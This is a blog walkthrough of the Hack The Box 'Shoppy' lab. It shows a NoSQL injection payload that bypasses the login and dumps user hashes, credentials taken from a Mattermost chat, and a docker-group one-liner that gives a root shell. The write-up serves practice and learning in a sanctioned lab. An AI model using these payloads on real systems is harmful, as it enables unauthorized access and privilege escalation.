C R E A T E & D E S T R OY

Shoppy | Hack The Box

22/tcp   open  ssh
80/tcp   open  http
9093/tcp open  copycat

A few ports open, we’ll start with the web server.

Nothing immediately interesting but a quick directory enumeration takes us to a login page.

While fuzzing for subdomains I find mattermost.shoppy.htb but I am convinced it’s a rabbit hole so will leave it for now and return to the main index

After spending quite some time on the login form of Shoppy I discover it’s vulnerable to NoSQLi. Using the payload admin’||’1’==’ lets us bypass straight into the admin portal.

Inputting exactly the same payload into the search users box gives us usernames and hashes, we can quickly crack Josh’s password.

_id	"62db0e93d6d6a999a66ee67a"
username	"admin"
password	"23c6877d9e2b564ef8b32c3a23de27b2"
_id	"62db0e93d6d6a999a66ee67b"
username	"josh"
password	"6ebcea65320589ca4f2f1ce039975995"

These creds don’t let us into SSH but remembering the subdomain we found early I am able to log in as josh./

Inside one of the chats we find credentials that do log us into the SSH.

jaeger@shoppy:~/ShoppyApp$ sudo -l                                                                                                  
[sudo] password for jaeger:                                                                                                         
Matching Defaults entries for jaeger on shoppy:                                                                                     
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin                          
User jaeger may run the following commands on shoppy:                                                                               
    (deploy) /home/deploy/password-manager                 

Seeing we can run password-manager as another user I’ll have a try.

So it seems I’ll need a password, I check back in the mattermost chat. Josh mentions working on a C++ password manager so I download it locally and have a look at the code in Ghidra.

We can see here that the password manager is looking only for the string “Sample”.

Now we get to move into a new user!

Our new account is not able to sudo anything, but is a member of the docker group, so this means we should be able to pop into a root shell with a simple one liner…

deploy@shoppy:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)

So now we can grab the root flag and the box is done.

A great room, I enjoyed that there wasn’t one hard sticking point. Took me a while to get the NoSQLi payload right.

Leave a Reply

Your email address will not be published. Required fields are marked *